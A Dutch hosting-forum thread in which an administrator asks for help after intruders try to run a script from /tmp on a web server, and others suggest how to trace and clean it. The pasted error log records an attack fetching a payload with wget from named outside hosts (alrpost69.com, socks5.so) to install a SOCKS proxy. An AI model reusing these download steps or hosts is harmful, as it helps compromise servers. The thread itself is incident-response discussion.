PDA

Bekijk Volledige Versie : Probleem hack script oid op server


Cloudy
02/02/15, 10:00
Hoi,

Sinds een dag of wat hebben we last van personen die een script vanuit de /tmp proberen op te starten.

Als we in de tmp map kijken staat er niets.

de error_log laat iets zien alla

--2015-02-01 13:51:25-- http://www.alrpost69.com/httpd
Resolving www.alrpost69.com... 206.248.0.3
Connecting to www.alrpost69.com|206.248.0.3|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2015-02-01 13:51:26 ERROR 404: Not Found.

chmod: missing operand after `777'
Try `chmod --help' for more information.
sh: line 1: httpd: command not found
sh: line 1: httpd: command not found
/bin/rm: cannot remove `httpd': No such file or directory
--2015-02-01 13:51:26-- http://socks5.so/snew.tar
Resolving socks5.so... 199.175.54.32
Connecting to socks5.so|199.175.54.32|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30720 (30K) [application/x-tar]
Saving to: "snew.tar"

0K .......... .......... .......... 100% 290K=0.1s

2015-02-01 13:51:26 (290 KB/s) - "snew.tar" saved [30720/30720]

perl: no process killed
You (apache) are not allowed to use this program (crontab)
See crontab(1) for more information
Could not bind to 2a01:7c8:aaae:3e3:5054:ff:fe84:914:36275

Heb ook al met maldet een scan gedaan. Kan ook niets vinden.

wie o wie?

Gerard
Mikey
02/02/15, 10:03
Probleem komt uit de website, of uit de modules die erin gebruikt zijn. Derden kunnen code executen via een omweg waarbij de huidige code niet in staat is om dit af te vangen.
Cloudy
02/02/15, 10:30
Hoi,

Uiteindelijk 2 bestanden gevonden via maldet. Echter stonden de 2 bestanden in de map clean van maldet. Wazig.

Echter nog geen idee hoe ze daar terecht zijn gekomen en wie ze daar heeft geplaatst? tips?
Mikey
02/02/15, 10:41
ftp logfiles en apache logfiles
TotallyHosted
02/02/15, 14:27
Vaak kun je met behulp van de aanmaaktijden van de bestanden die je terugvindt, wel in je logs terugvinden welke site ervoor verantwoordelijk is.
cyrano
02/02/15, 17:49
Met scanners kan je niet veel beginnen. Ik heb de .tar even door virustotal.com gejaagd en geen enkel AV herkent dit.

Ze proberen een mini socks server (sss) te installeren, mogelijk als IRC proxy. Al hun download sites zijn nog operationeel, dus ik vermoed dat ze gaan terugkomen met verbeterde versies. Deze kan je als beta beschouwen.

Zoek naar verborgen users. De laatste die ik tegenkwam, hadden creatieve namen als cache, php, perl of iets met java in de naam.